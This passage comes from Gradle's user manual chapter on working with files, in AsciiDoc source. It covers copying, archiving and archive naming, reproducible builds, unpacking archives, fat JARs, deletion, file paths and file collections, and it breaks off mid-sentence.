ZIP\n====\ninclude::sample[dir=\"snippets\/files\/copy\/groovy\",files=\"build.gradle[tags=create-archive-example]\"]\ninclude::sample[dir=\"snippets\/files\/copy\/kotlin\",files=\"build.gradle.kts[tags=create-archive-example]\"]\n====\n\nIn the next section you'll learn about convention-based archive names, which can save you from always configuring the destination directory and archive name.\n\nThe full power of copy specifications are available to you when creating archives, which means you can do content filtering, file renaming or anything else that is covered in the previous section. A particularly common requirement is copying files into subdirectories of the archive that don't exist in the source folders, something that can be achieved with `into()` <<#sub:using_child_copy_specifications,child specifications>>.\n\nGradle does of course allow you create as many archive tasks as you want, but it's worth bearing in mind that many convention-based plugins provide their own. For example, the Java plugin adds a `jar` task for packaging a project's compiled classes and resources in a JAR. Many of these plugins provide sensible conventions for the names of archives as well as the copy specifications used. We recommend you use these tasks wherever you can, rather than overriding them with your own.\n\n[[sec:archive_naming]]\n=== Archive naming\n\nGradle has several conventions around the naming of archives and where they are created based on the plugins your project uses. The main convention is provided by the <<base_plugin.adoc#base_plugin,Base Plugin>>, which defaults to creating archives in the `$buildDir\/distributions` directory and typically uses archive names of the form _[projectName]-[version].[type]_.\n\nThe following example comes from a project named `archive-naming`, hence the `myZip` task creates an archive named `archive-naming-1.0.zip`:\n\n.Creation of ZIP archive\n====\ninclude::sample[dir=\"snippets\/files\/archiveNaming\/groovy\",files=\"build.gradle[tags=zip-task]\"]\ninclude::sample[dir=\"snippets\/files\/archiveNaming\/kotlin\",files=\"build.gradle.kts[tags=zip-task]\"]\n====\n\n.Output of **`gradle -q myZip`**\n----\n> gradle -q myZip\ninclude::{snippetsPath}\/files\/archiveNaming\/tests\/archiveNaming.out[]\n----\n\nNote that the name of the archive does _not_ derive from the name of the task that creates it.\n\nIf you want to change the name and location of a generated archive file, you can provide values for the `archiveFileName` and `destinationDirectory` properties of the corresponding task.\nThese override any conventions that would otherwise apply.\n\nAlternatively, you can make use of the default archive name pattern provided by link:{groovyDslPath}\/org.gradle.api.tasks.bundling.AbstractArchiveTask.html#org.gradle.api.tasks.bundling.AbstractArchiveTask:archiveFileName[AbstractArchiveTask.getArchiveFileName()]: _[archiveBaseName]-[archiveAppendix]-[archiveVersion]-[archiveClassifier].[archiveExtension]_.\nYou can set each of these properties on the task separately if you wish.\nNote that the Base Plugin uses the convention of project name for _archiveBaseName_, project version for _archiveVersion_ and the archive type for _archiveExtension_.\nIt does not provide values for the other properties.\n\nThis example \u2014 from the same project as the one above \u2014 configures just the `archiveBaseName` property, overriding the default value of the project name:\n\n.Configuration of archive task - custom archive name\n====\ninclude::sample[dir=\"snippets\/files\/archiveNaming\/groovy\",files=\"build.gradle[tags=zip-task-with-custom-base-name]\"]\ninclude::sample[dir=\"snippets\/files\/archiveNaming\/kotlin\",files=\"build.gradle.kts[tags=zip-task-with-custom-base-name]\"]\n====\n\n.Output of **`gradle -q myCustomZip`**\n----\n> gradle -q myCustomZip\ninclude::{snippetsPath}\/files\/archiveNaming\/tests\/zipWithCustomName.out[]\n----\n\nYou can also override the default `archiveBaseName` value for _all_ the archive tasks in your build by using the _project_ property `archivesBaseName`, as demonstrated by the following example:\n\n.Configuration of archive task - appendix & classifier\n====\ninclude::sample[dir=\"snippets\/files\/archivesChangedBaseName\/groovy\",files=\"build.gradle[]\"]\ninclude::sample[dir=\"snippets\/files\/archivesChangedBaseName\/kotlin\",files=\"build.gradle.kts[]\"]\n====\n\n.Output of **`gradle -q echoNames`**\n----\n> gradle -q echoNames\ninclude::{snippetsPath}\/files\/archivesChangedBaseName\/tests\/zipWithArchivesBaseName.out[]\n----\n\nYou can find all the possible archive task properties in the API documentation for link:{groovyDslPath}\/org.gradle.api.tasks.bundling.AbstractArchiveTask.html[AbstractArchiveTask], but we have also summarized the main ones here:\n\n`archiveFileName` \u2014 `Property<String>`, default: `__archiveBaseName__-__archiveAppendix__-__archiveVersion__-__archiveClassifier__.__archiveExtension__`::\nThe complete file name of the generated archive. If any of the properties in the default value are empty, their '-' separator is dropped.\n\n`archiveFile` \u2014 `Provider<RegularFile>`, _read-only_, default: `__destinationDirectory__\/__archiveFileName__`::\nThe absolute file path of the generated archive.\n\n`destinationDirectory` \u2014 `DirectoryProperty`, default: depends on archive type::\nThe target directory in which to put the generated archive. By default, JARs and WARs go into `$buildDir\/libs`. ZIPs and TARs go into `$buildDir\/distributions`.\n\n`archiveBaseName` \u2014 `Property<String>`, default: `__project.name__`::\nThe base name portion of the archive file name, typically a project name or some other descriptive name for what it contains.\n\n`archiveAppendix` \u2014 `Property<String>`, default: `null`::\nThe appendix portion of the archive file name that comes immediately after the base name. It is typically used to distinguish between different forms of content, such as code and docs, or a minimal distribution versus a full or complete one.\n\n`archiveVersion` \u2014 `Property<String>`, default: `__project.version__`::\nThe version portion of the archive file name, typically in the form of a normal project or product version.\n\n`archiveClassifier` \u2014 `Property<String>`, default: `null`::\nThe classifier portion of the archive file name. Often used to distinguish between archives that target different platforms.\n\n`archiveExtension` \u2014 `Property<String>`, default: depends on archive type and compression type::\nThe filename extension for the archive. By default, this is set based on the archive task type and the compression type (if you're creating a TAR). Will be one of: `zip`, `jar`, `war`, `tar`, `tgz` or `tbz2`. You can of course set this to a custom extension if you wish.\n\n[[sec:sharing_content_between_multiple_archives]]\n=== Sharing content between multiple archives\n\n<<#sub:sharing_copy_specs,As described earlier>>, you can use the link:{groovyDslPath}\/org.gradle.api.Project.html#org.gradle.api.Project:copySpec(org.gradle.api.Action)[Project.copySpec(org.gradle.api.Action)] method to share content between archives.\n\n[[sec:reproducible_archives]]\n=== Reproducible builds\n\nSometimes it's desirable to recreate archives exactly the same, byte for byte, on different machines. You want to be sure that building an artifact from source code produces the same result no matter when and where it is built. This is necessary for projects like https:\/\/reproducible-builds.org\/[reproducible-builds.org].\n\nReproducing the same byte-for-byte archive poses some challenges since the order of the files in an archive is influenced by the underlying file system. Each time a ZIP, TAR, JAR, WAR or EAR is built from source, the order of the files inside the archive may change. Files that only have a different timestamp also causes differences in archives from build to build. All link:{groovyDslPath}\/org.gradle.api.tasks.bundling.AbstractArchiveTask.html[AbstractArchiveTask] (e.g. Jar, Zip) tasks shipped with Gradle include support for producing reproducible archives.\n\nFor example, to make a `Zip` task reproducible you need to set link:{groovyDslPath}\/org.gradle.api.tasks.bundling.Zip.html#org.gradle.api.tasks.bundling.Zip:reproducibleFileOrder[Zip.isReproducibleFileOrder()] to `true` and link:{groovyDslPath}\/org.gradle.api.tasks.bundling.Zip.html#org.gradle.api.tasks.bundling.Zip:preserveFileTimestamps[Zip.isPreserveFileTimestamps()] to `false`. In order to make all archive tasks in your build reproducible, consider adding the following configuration to your build file:\n\n.Activating reproducible archives\n====\ninclude::sample[dir=\"snippets\/files\/archives\/groovy\",files=\"build.gradle[tags=reproducible]\"]\ninclude::sample[dir=\"snippets\/files\/archives\/kotlin\",files=\"build.gradle.kts[tags=reproducible]\"]\n====\n\nOften you will want to publish an archive, so that it is usable from another project.\nThis process is described in <<cross_project_publications.adoc#cross_project_publications,Cross-Project publications>>.\n","old_contents":"\/\/ Copyright 2017 the original author or authors.\n\/\/\n\/\/ Licensed under the Apache License, Version 2.0 (the \"License\");\n\/\/ you may not use this file except in compliance with the License.\n\/\/ You may obtain a copy of the License at\n\/\/\n\/\/ http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n\/\/\n\/\/ Unless required by applicable law or agreed to in writing, software\n\/\/ distributed under the License is distributed on an \"AS IS\" BASIS,\n\/\/ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n\/\/ See the License for the specific language governing permissions and\n\/\/ limitations under the License.\n\n[[working_with_files]]\n= Working With Files\n\nAlmost every Gradle build interacts with files in some way: think source files, file dependencies, reports and so on. That's why Gradle comes with a comprehensive API that makes it simple to perform the file operations you need.\n\nThe API has two parts to it:\n\n * Specifying which files and directories to process\n * Specifying what to do with them\n\nThe <<#sec:locating_files,File paths in depth>> section covers the first of these in detail, while subsequent sections, like <<#sec:copying_files,File copying in depth>>, cover the second. To begin with, we'll show you examples of the most common scenarios that users encounter.\n\n[[sec:copying_single_file_example]]\n== Copying a single file\n\nYou copy a file by creating an instance of Gradle's builtin link:{groovyDslPath}\/org.gradle.api.tasks.Copy.html[Copy] task and configuring it with the location of the file and where you want to put it. This example mimics copying a generated report into a directory that will be packed into an archive, such as a ZIP or TAR:\n\n.How to copy a single file\n====\ninclude::sample[dir=\"snippets\/files\/copy\/groovy\",files=\"build.gradle[tags=copy-single-file-example]\"]\ninclude::sample[dir=\"snippets\/files\/copy\/kotlin\",files=\"build.gradle.kts[tags=copy-single-file-example]\"]\n====\n\nThe link:{groovyDslPath}\/org.gradle.api.Project.html#org.gradle.api.Project:file(java.lang.Object)[Project.file(java.lang.Object)] method is used to create a file or directory path relative to the current project and is a common way to make build scripts work regardless of the project path. The file and directory paths are then used to specify what file to copy using link:{groovyDslPath}\/org.gradle.api.tasks.Copy.html#org.gradle.api.tasks.Copy:from(java.lang.Object++[]++)[Copy.from(java.lang.Object...)] and which directory to copy it to using link:{groovyDslPath}\/org.gradle.api.tasks.Copy.html#org.gradle.api.tasks.Copy:into(java.lang.Object)[Copy.into(java.lang.Object)].\n\nYou can even use the path directly without the `file()` method, as explained early in the section <<#sec:copying_files,File copying in depth>>:\n\n.Using implicit string paths\n====\ninclude::sample[dir=\"snippets\/files\/copy\/groovy\",files=\"build.gradle[tags=copy-single-file-example-without-file-method]\"]\ninclude::sample[dir=\"snippets\/files\/copy\/kotlin\",files=\"build.gradle.kts[tags=copy-single-file-example-without-file-method]\"]\n====\n\nAlthough hard-coded paths make for simple examples, they also make the build brittle. It's better to use a reliable, single source of truth, such as a task or shared project property. In the following modified example, we use a report task defined elsewhere that has the report's location stored in its `outputFile` property:\n\n.Prefer task\/project properties over hard-coded paths\n====\ninclude::sample[dir=\"snippets\/files\/copy\/groovy\",files=\"build.gradle[tags=copy-single-file-example-with-task-properties]\"]\ninclude::sample[dir=\"snippets\/files\/copy\/kotlin\",files=\"build.gradle.kts[tags=copy-single-file-example-with-task-properties]\"]\n====\n\nWe have also assumed that the reports will be archived by `archiveReportsTask`, which provides us with the directory that will be archived and hence where we want to put the copies of the reports.\n\n[[sec:copying_multiple_files_example]]\n== Copying multiple files\n\nYou can extend the previous examples to multiple files very easily by providing multiple arguments to `from()`:\n\n.Using multiple arguments with from()\n====\ninclude::sample[dir=\"snippets\/files\/copy\/groovy\",files=\"build.gradle[tags=copy-multiple-files-example]\"]\ninclude::sample[dir=\"snippets\/files\/copy\/kotlin\",files=\"build.gradle.kts[tags=copy-multiple-files-example]\"]\n====\n\nTwo files are now copied into the archive directory. You can also use multiple `from()` statements to do the same thing, as shown in the first example of the section <<#sec:copying_files, File copying in depth>>.\n\nNow consider another example: what if you want to copy all the PDFs in a directory without having to specify each one? To do this, attach inclusion and\/or exclusion patterns to the copy specification. Here we use a string pattern to include PDFs only:\n\n.Using a flat filter\n====\ninclude::sample[dir=\"snippets\/files\/copy\/groovy\",files=\"build.gradle[tags=copy-multiple-files-with-flat-filter-example]\"]\ninclude::sample[dir=\"snippets\/files\/copy\/kotlin\",files=\"build.gradle.kts[tags=copy-multiple-files-with-flat-filter-example]\"]\n====\n\nOne thing to note, as demonstrated in the following diagram, is that only the PDFs that reside directly in the `reports` directory are copied:\n\n.The effect of a flat filter on copying\nimage::copy-with-flat-filter-example.png[]\n\nYou can include files in subdirectories by using an Ant-style glob pattern (`\\**\/*`), as done in this updated example:\n\n.Using a deep filter\n====\ninclude::sample[dir=\"snippets\/files\/copy\/groovy\",files=\"build.gradle[tags=copy-multiple-files-with-deep-filter-example]\"]\ninclude::sample[dir=\"snippets\/files\/copy\/kotlin\",files=\"build.gradle.kts[tags=copy-multiple-files-with-deep-filter-example]\"]\n====\n\nThis task has the following effect:\n\n.The effect of a deep filter on copying\nimage::copy-with-deep-filter-example.png[]\n\nOne thing to bear in mind is that a deep filter like this has the side effect of copying the directory structure below `reports` as well as the files. If you just want to copy the files without the directory structure, you need to use an explicit `fileTree(_dir_) { _includes_ }.files` expression. We talk more about the difference between file trees and file collections in the <<#sec:file_trees,File trees>> section.\n\nThis is just one of the variations in behavior you're likely to come across when dealing with file operations in Gradle builds. Fortunately, Gradle provides elegant solutions to almost all those use cases. Read the _in-depth_ sections later in the chapter for more detail on how the file operations work in Gradle and what options you have for configuring them.\n\n[[sec:copying_directories_example]]\n== Copying directory hierarchies\n\nYou may have a need to copy not just files, but the directory structure they reside in as well. This is the default behavior when you specify a directory as the `from()` argument, as demonstrated by the following example that copies everything in the `reports` directory, including all its subdirectories, to the destination:\n\n.Copying an entire directory\n====\ninclude::sample[dir=\"snippets\/files\/copy\/groovy\",files=\"build.gradle[tags=copy-directory-example]\"]\ninclude::sample[dir=\"snippets\/files\/copy\/kotlin\",files=\"build.gradle.kts[tags=copy-directory-example]\"]\n====\n\nThe key aspect that users struggle with is controlling how much of the directory structure goes to the destination. In the above example, do you get a `toArchive\/reports` directory or does everything in `reports` go straight into `toArchive`? The answer is the latter. If a directory is part of the `from()` path, then it _won't_ appear in the destination.\n\nSo how do you ensure that `reports` itself is copied across, but not any other directory in `$buildDir`? The answer is to add it as an include pattern:\n\n.Copying an entire directory, including itself\n====\ninclude::sample[dir=\"snippets\/files\/copy\/groovy\",files=\"build.gradle[tags=copy-directory-including-itself-example]\"]\ninclude::sample[dir=\"snippets\/files\/copy\/kotlin\",files=\"build.gradle.kts[tags=copy-directory-including-itself-example]\"]\n====\n\nYou'll get the same behavior as before except with one extra level of directory in the destination, i.e. `toArchive\/reports`.\n\nOne thing to note is how the `include()` directive applies only to the `from()`, whereas the directive in the previous section applied to the whole task.\nThese different levels of granularity in the copy specification allow you to easily handle most requirements that you will come across.\nYou can learn more about this in the section on <<sub:using_child_copy_specifications,child specifications>>.\n\n[[sec:creating_archives_example]]\n== Creating archives (zip, tar, etc.)\n\nFrom the perspective of Gradle, packing files into an archive is effectively a copy in which the destination is the archive file rather than a directory on the file system. This means that creating archives looks a lot like copying, with all of the same features!\n\nThe simplest case involves archiving the entire contents of a directory, which this example demonstrates by creating a ZIP of the `toArchive` directory:\n\n.Archiving a directory as a ZIP\n====\ninclude::sample[dir=\"snippets\/files\/copy\/groovy\",files=\"build.gradle[tags=create-archive-example]\"]\ninclude::sample[dir=\"snippets\/files\/copy\/kotlin\",files=\"build.gradle.kts[tags=create-archive-example]\"]\n====\n\nNotice how we specify the destination and name of the archive instead of an `into()`: both are required. You often won't see them explicitly set, because most projects apply the <<base_plugin.adoc#base_plugin,Base Plugin>>. It provides some conventional values for those properties. The next example demonstrates this and you can learn more about the conventions in the <<#sec:archive_naming,archive naming>> section.\n\nEach type of archive has its own task type, the most common ones being link:{groovyDslPath}\/org.gradle.api.tasks.bundling.Zip.html[Zip], link:{groovyDslPath}\/org.gradle.api.tasks.bundling.Tar.html[Tar] and link:{groovyDslPath}\/org.gradle.api.tasks.bundling.Jar.html[Jar]. They all share most of the configuration options of `Copy`, including filtering and renaming.\n\nOne of the most common scenarios involves copying files into specified subdirectories of the archive. For example, let's say you want to package all PDFs into a `docs` directory in the root of the archive. This `docs` directory doesn't exist in the source location, so you have to create it as part of the archive. You do this by adding an `into()` declaration for just the PDFs:\n\n.Using the Base Plugin for its archive name convention\n====\ninclude::sample[dir=\"snippets\/files\/archivesWithBasePlugin\/groovy\",files=\"build.gradle[tags=create-archive-with-base-plugin-example]\"]\ninclude::sample[dir=\"snippets\/files\/archivesWithBasePlugin\/kotlin\",files=\"build.gradle.kts[tags=create-archive-with-base-plugin-example]\"]\n====\n\nAs you can see, you can have multiple `from()` declarations in a copy specification, each with its own configuration. See <<#sub:using_child_copy_specifications,Using child copy specifications>> for more information on this feature.\n\n[[sec:unpacking_archives_example]]\n== Unpacking archives\n\nArchives are effectively self-contained file systems, so unpacking them is a case of copying the files from that file system onto the local file system \u2014\u00a0or even into another archive.\nGradle enables this by providing some wrapper functions that make archives available as hierarchical collections of files (<<sec:file_trees,file trees>>).\n\nThe two functions of interest are link:{groovyDslPath}\/org.gradle.api.Project.html#org.gradle.api.Project:zipTree(java.lang.Object)[Project.zipTree(java.lang.Object)] and link:{groovyDslPath}\/org.gradle.api.Project.html#org.gradle.api.Project:tarTree(java.lang.Object)[Project.tarTree(java.lang.Object)], which produce a link:{javadocPath}\/org\/gradle\/api\/file\/FileTree.html[FileTree] from a corresponding archive file. That file tree can then be used in a `from()` specification, like so:\n\n.Unpacking a ZIP file\n====\ninclude::sample[dir=\"snippets\/files\/archives\/groovy\",files=\"build.gradle[tags=unpack-archive-example]\"]\ninclude::sample[dir=\"snippets\/files\/archives\/kotlin\",files=\"build.gradle.kts[tags=unpack-archive-example]\"]\n====\n\nAs with a normal copy, you can control which files are unpacked via <<#sec:filtering_files,filters>> and even <<#sec:renaming_files,rename files>> as they are unpacked.\n\nMore advanced processing can be handled by the link:{groovyDslPath}\/org.gradle.api.tasks.AbstractCopyTask.html#eachFile(org.gradle.api.Action)[eachFile()] method. For example, you might need to extract different subtrees of the archive into different paths within the destination directory. The following sample uses the method to extract the files within the archive's `libs` directory into the root destination directory, rather than into a `libs` subdirectory:\n\n.Unpacking a subset of a ZIP file\n====\ninclude::sample[dir=\"snippets\/files\/archives\/groovy\",files=\"build.gradle[tags=unpack-archive-subset-example]\"]\ninclude::sample[dir=\"snippets\/files\/archives\/kotlin\",files=\"build.gradle.kts[tags=unpack-archive-subset-example]\"]\n====\n<1> Extracts only the subset of files that reside in the `libs` directory\n<2> Remaps the path of the extracting files into the destination directory by dropping the `libs` segment from the file path\n<3> Ignores the empty directories resulting from the remapping, see Caution note below\n\n[CAUTION]\n====\nYou can not change the destination path of empty directories with this technique.\nYou can learn more in https:\/\/github.com\/gradle\/gradle\/issues\/2940[this issue].\n====\n\nIf you're a Java developer and are wondering why there is no `jarTree()` method, that's because `zipTree()` works perfectly well for JARs, WARs and EARs.\n\n[[sec:creating_uber_jar_example]]\n== Creating \"uber\" or \"fat\" JARs\n\nIn the Java space, applications and their dependencies typically used to be packaged as separate JARs within a single distribution archive. That still happens, but there is another approach that is now common: placing the classes and resources of the dependencies directly into the application JAR, creating what is known as an uber or fat JAR.\n\nGradle makes this approach easy to accomplish. Consider the aim: to copy the contents of other JAR files into the application JAR. All you need for this is the link:{groovyDslPath}\/org.gradle.api.Project.html#org.gradle.api.Project:zipTree(java.lang.Object)[Project.zipTree(java.lang.Object)] method and the link:{groovyDslPath}\/org.gradle.api.tasks.bundling.Jar.html[Jar] task, as demonstrated by the `uberJar` task in the following example:\n\n.Creating a Java uber or fat JAR\n====\ninclude::sample[dir=\"snippets\/files\/archivesWithJavaPlugin\/groovy\",files=\"build.gradle[tags=create-uber-jar-example]\"]\ninclude::sample[dir=\"snippets\/files\/archivesWithJavaPlugin\/kotlin\",files=\"build.gradle.kts[tags=create-uber-jar-example]\"]\n====\n\nIn this case, we're taking the runtime dependencies of the project \u2014 `configurations.runtimeClasspath.files` \u2014 and wrapping each of the JAR files with the `zipTree()` method. The result is a collection of ZIP file trees, the contents of which are copied into the uber JAR alongside the application classes.\n\n[[sec:creating_directories_example]]\n== Creating directories\n\nMany tasks need to create directories to store the files they generate, which is why Gradle automatically manages this aspect of tasks when they explicitly define file and directory outputs. You can learn about this feature in the <<more_about_tasks.adoc#sec:up_to_date_checks,incremental build>> section of the user manual. All core Gradle tasks ensure that any output directories they need are created if necessary using this mechanism.\n\nIn cases where you need to create a directory manually, you can use the link:{groovyDslPath}\/org.gradle.api.Project.html#org.gradle.api.Project:mkdir(java.lang.Object)[Project.mkdir(java.lang.Object)] method from within your build scripts or custom task implementations. Here's a simple example that creates a single `images` directory in the project folder:\n\n.Manually creating a directory\n====\ninclude::sample[dir=\"snippets\/files\/misc\/groovy\",files=\"build.gradle[tags=mkdir-example]\"]\ninclude::sample[dir=\"snippets\/files\/misc\/kotlin\",files=\"build.gradle.kts[tags=mkdir-example]\"]\n====\n\nAs described in the {antManual}\/Tasks\/mkdir.html[Apache Ant manual], the `mkdir` task will automatically create all necessary directories in the given path and will do nothing if the directory already exists.\n\n[[sec:moving_files_example]]\n== Moving files and directories\n\nGradle has no API for moving files and directories around, but you can use the <<ant.adoc#ant,Apache Ant integration>> to easily do that, as shown in this example:\n\n.Moving a directory using the Ant task\n====\ninclude::sample[dir=\"snippets\/files\/misc\/groovy\",files=\"build.gradle[tags=move-example]\"]\ninclude::sample[dir=\"snippets\/files\/misc\/kotlin\",files=\"build.gradle.kts[tags=move-example]\"]\n====\n\nThis is not a common requirement and should be used sparingly as you lose information and can easily break a build. It's generally preferable to copy directories and files instead.\n\n[[sec:renaming_files_example]]\n== Renaming files on copy\n\nThe files used and generated by your builds sometimes don't have names that suit, in which case you want to rename those files as you copy them. Gradle allows you to do this as part of a copy specification using the `rename()` configuration.\n\nThe following example removes the \"-staging-\" marker from the names of any files that have it:\n\n.Renaming files as they are copied\n====\ninclude::sample[dir=\"snippets\/files\/copy\/groovy\",files=\"build.gradle[tags=rename-on-copy-example]\"]\ninclude::sample[dir=\"snippets\/files\/copy\/kotlin\",files=\"build.gradle.kts[tags=rename-on-copy-example]\"]\n====\n\nYou can use regular expressions for this, as in the above example, or closures that use more complex logic to determine the target filename. For example, the following task truncates filenames:\n\n.Truncating filenames as they are copied\n====\ninclude::sample[dir=\"snippets\/files\/copy\/groovy\",files=\"build.gradle[tags=truncate-names-example]\"]\ninclude::sample[dir=\"snippets\/files\/copy\/kotlin\",files=\"build.gradle.kts[tags=truncate-names-example]\"]\n====\n\nAs with filtering, you can also apply renaming to a subset of files by configuring it as part of a child specification on a `from()`.\n\n[[sec:deleting_files_example]]\n== Deleting files and directories\n\nYou can easily delete files and directories using either the link:{groovyDslPath}\/org.gradle.api.tasks.Delete.html[Delete] task or the link:{groovyDslPath}\/org.gradle.api.Project.html#org.gradle.api.Project:delete(org.gradle.api.Action)[Project.delete(org.gradle.api.Action)] method.\nIn both cases, you specify which files and directories to delete in a way supported by the link:{groovyDslPath}\/org.gradle.api.Project.html#org.gradle.api.Project:files(java.lang.Object++[]++)[Project.files(java.lang.Object...)] method.\n\nFor example, the following task deletes the entire contents of a build's output directory:\n\n.Deleting a directory\n====\ninclude::sample[dir=\"snippets\/files\/misc\/groovy\",files=\"build.gradle[tags=delete-example]\"]\ninclude::sample[dir=\"snippets\/files\/misc\/kotlin\",files=\"build.gradle.kts[tags=delete-example]\"]\n====\n\nIf you want more control over which files are deleted, you can't use inclusions and exclusions in the same way as for copying files.\nInstead, you have to use the builtin filtering mechanisms of `FileCollection` and `FileTree`.\nThe following example does just that to clear out temporary files from a source directory:\n\n.Deleting files matching a specific pattern\n====\ninclude::sample[dir=\"snippets\/files\/misc\/groovy\",files=\"build.gradle[tags=delete-with-filter-example]\"]\ninclude::sample[dir=\"snippets\/files\/misc\/kotlin\",files=\"build.gradle.kts[tags=delete-with-filter-example]\"]\n====\n\nYou'll learn more about file collections and file trees in the next section.\n\n[[sec:locating_files]]\n== File paths in depth\n\nIn order to perform some action on a file, you need to know where it is, and that's the information provided by file paths. Gradle builds on the standard Java `{javaApi}\/java\/io\/File.html[File]` class, which represents the location of a single file, and provides new APIs for dealing with collections of paths. This section shows you how to use the Gradle APIs to specify file paths for use in tasks and file operations.\n\nBut first, an important note on using hard-coded file paths in your builds.\n\n\n[[sec:hard_coded_file_paths]]\n=== On hard-coded file paths\n\nMany examples in this chapter use hard-coded paths as string literals. This makes them easy to understand, but it's not good practice for real builds. The problem is that paths often change and the more places you need to change them, the more likely you are to miss one and break the build.\n\nWhere possible, you should use tasks, task properties, and <<writing_build_scripts.adoc#sec:extra_properties,project properties>> \u2014 in that order of preference \u2014 to configure file paths. For example, if you were to create a task that packages the compiled classes of a Java application, you should aim for something like this:\n\n.How to minimize the number of hard-coded paths in your build\n====\ninclude::sample[dir=\"snippets\/files\/sampleJavaProject\/groovy\",files=\"build.gradle[tags=link-task-properties]\"]\ninclude::sample[dir=\"snippets\/files\/sampleJavaProject\/kotlin\",files=\"build.gradle.kts[tags=link-task-properties]\"]\n====\n\nSee how we're using the `compileJava` task as the source of the files to package and we've created a project property `archivesDirPath` to store the location where we put archives, on the basis we're likely to use it elsewhere in the build.\n\nUsing a task directly as an argument like this relies on it having <<more_about_tasks.adoc#sec:task_inputs_outputs,defined outputs>>, so it won't always be possible.\nIn addition, this example could be improved further by relying on the Java plugin's convention for `destinationDirectory` rather than overriding it, but it does demonstrate the use of project properties.\n\n[[sec:single_file_paths]]\n=== Single files and directories\n\nGradle provides the link:{groovyDslPath}\/org.gradle.api.Project.html#org.gradle.api.Project:file(java.lang.Object)[Project.file(java.lang.Object)] method for specifying the location of a single file or directory.\nRelative paths are resolved relative to the project directory, while absolute paths remain unchanged.\n\n[CAUTION]\n====\nNever use `new File(relative path)` because this creates a path relative to the current working directory (CWD). Gradle can make no guarantees about the location of the CWD, which means builds that rely on it may break at any time.\n====\n\nHere are some examples of using the `file()` method with different types of argument:\n\n.Locating files\n====\ninclude::sample[dir=\"snippets\/files\/file\/groovy\",files=\"build.gradle[tags=simple-params]\"]\ninclude::sample[dir=\"snippets\/files\/file\/kotlin\",files=\"build.gradle.kts[tags=simple-params]\"]\n====\n\nAs you can see, you can pass strings, `File` instances and `{javaApi}\/java\/nio\/file\/Path.html[Path]` instances to the `file()` method, all of which result in an absolute `File` object. You can find other options for argument types in the reference guide, linked in the previous paragraph.\n\nWhat happens in the case of multi-project builds? The `file()` method will always turn relative paths into paths that are relative to the current project directory, which may be a child project. If you want to use a path that's relative to the _root project_ directory, then you need to use the special link:{groovyDslPath}\/org.gradle.api.Project.html#org.gradle.api.Project:rootDir[Project.getRootDir()] property to construct an absolute path, like so:\n\n.Creating a path relative to a parent project\n====\ninclude::sample[dir=\"snippets\/files\/misc\/groovy\/project2\",files=\"build.gradle[tags=using-root-dir-property]\"]\ninclude::sample[dir=\"snippets\/files\/misc\/kotlin\/project2\",files=\"build.gradle.kts[tags=using-root-dir-property]\"]\n====\n\nLet's say you're working on a multi-project build in a `dev\/projects\/AcmeHealth` directory. You use the above example in the build of the library you're fixing \u2014 at `AcmeHealth\/subprojects\/AcmePatientRecordLib\/build.gradle`. The file path will resolve to the absolute version of `dev\/projects\/AcmeHealth\/shared\/config.xml`.\n\nThe `file()` method can be used to configure any task that has a property of type `File`. Many tasks, though, work on multiple files, so we look at how to specify sets of files next.\n\n[[sec:file_collections]]\n=== File collections\n\nA _file collection_ is simply a set of file paths that's represented by the link:{javadocPath}\/org\/gradle\/api\/file\/FileCollection.html[FileCollection] interface. _Any_ file paths.\nIt's important to understand that the file paths don't have to be related in any way, so they don't have to be in the same directory or even have a shared parent directory.\nYou will also find that many parts of the Gradle API use `FileCollection`, such as the copying API discussed later in this chapter and <<declaring_dependencies.adoc#sec:what-are-dependency-configurations,dependency configurations>>.\n\nThe recommended way to specify a collection of files is to use the link:{javadocPath}\/org\/gradle\/api\/file\/ProjectLayout.html#files-java.lang.Object++...++-[ProjectLayout.files(java.lang.Object++...++)] method, which returns a `FileCollection` instance.\nThis method is very flexible and allows you to pass multiple strings, `File` instances, collections of strings, collections of ``File``s, and more.\nYou can even pass in tasks as arguments if they have <<more_about_tasks.adoc#sec:task_inputs_outputs,defined outputs>>.\nLearn about all the supported argument types in the reference guide.\n\n[CAUTION]\n====\nAlthough the `files()` method accepts `File` instances, never use `new File(relative path)` with it because this creates a path relative to the current working directory (CWD). Gradle can make no guarantees about the location of the CWD, which means builds that rely on it may break at any time.\n====\n\nAs with the link:{groovyDslPath}\/org.gradle.api.Project.html#org.gradle.api.Project:file(java.lang.Object)[Project.file(java.lang.Object)] method covered in the <<#sec:single_file_paths,previous section>>, all relative paths are evaluated relative to the current project directory. The following example demonstrates some of the variety of argument types you can use \u2014 strings, `File` instances, a list and a `{javaApi}\/java\/nio\/file\/Path.html[Path]`:\n\n.Creating a file collection\n====\ninclude::sample[dir=\"snippets\/files\/fileCollections\/groovy\",files=\"build.gradle[tags=simple-params]\"]\ninclude::sample[dir=\"snippets\/files\/fileCollections\/kotlin\",files=\"build.gradle.kts[tags=simple-params]\"]\n====\n\nFile collections have some important attributes in Gradle. They can be:\n\n * created lazily\n * iterated over\n * filtered\n * combined\n\n_Lazy creation_ of a file collection is useful when you need to evaluate the files that make up a collection at the time a build runs. In the following example, we query the file system to find out what files exist in a particular directory and then make those into a file collection:\n\n.Implementing a file collection\n====\ninclude::sample[dir=\"snippets\/files\/fileCollections\/groovy\",files=\"build.gradle[tags=closure]\"]\ninclude::sample[dir=\"snippets\/files\/fileCollections\/kotlin\",files=\"build.gradle.kts[tags=closure]\"]\n====\n\n.Output of **`gradle -q list`**\n----\n> gradle -q list\ninclude::{snippetsPath}\/files\/fileCollections\/tests\/fileCollectionsWithClosure.out[]\n----\n\nThe key to lazy creation is passing a closure (in Groovy) or a `Provider` (in Kotlin) to the `files()` method. Your closure\/provider simply needs to return a value of a type accepted by `files()`, such as `List<File>`, `String`, `FileCollection`, etc.\n\n_Iterating over a file collection_ can be done through the `each()` method (in Groovy) of `forEach` method (in Kotlin) on the collection or using the collection in a `for` loop. In both approaches, the file collection is treated as a set of `File` instances, i.e. your iteration variable will be of type `File`.\n\nThe following example demonstrates such iteration as well as how you can convert file collections to other types using the `as` operator or supported properties:\n\n.Using a file collection\n====\ninclude::sample[dir=\"snippets\/files\/fileCollections\/groovy\",files=\"build.gradle[tags=usage]\"]\ninclude::sample[dir=\"snippets\/files\/fileCollections\/kotlin\",files=\"build.gradle.kts[tags=usage]\"]\n====\n\nYou can also see at the end of the example _how to combine file collections_ using the `+` and `-` operators to merge and subtract them. An important feature of the resulting file collections is that they are _live_. In other words, when you combine file collections in this way, the result always reflects what's currently in the source file collections, even if they change during the 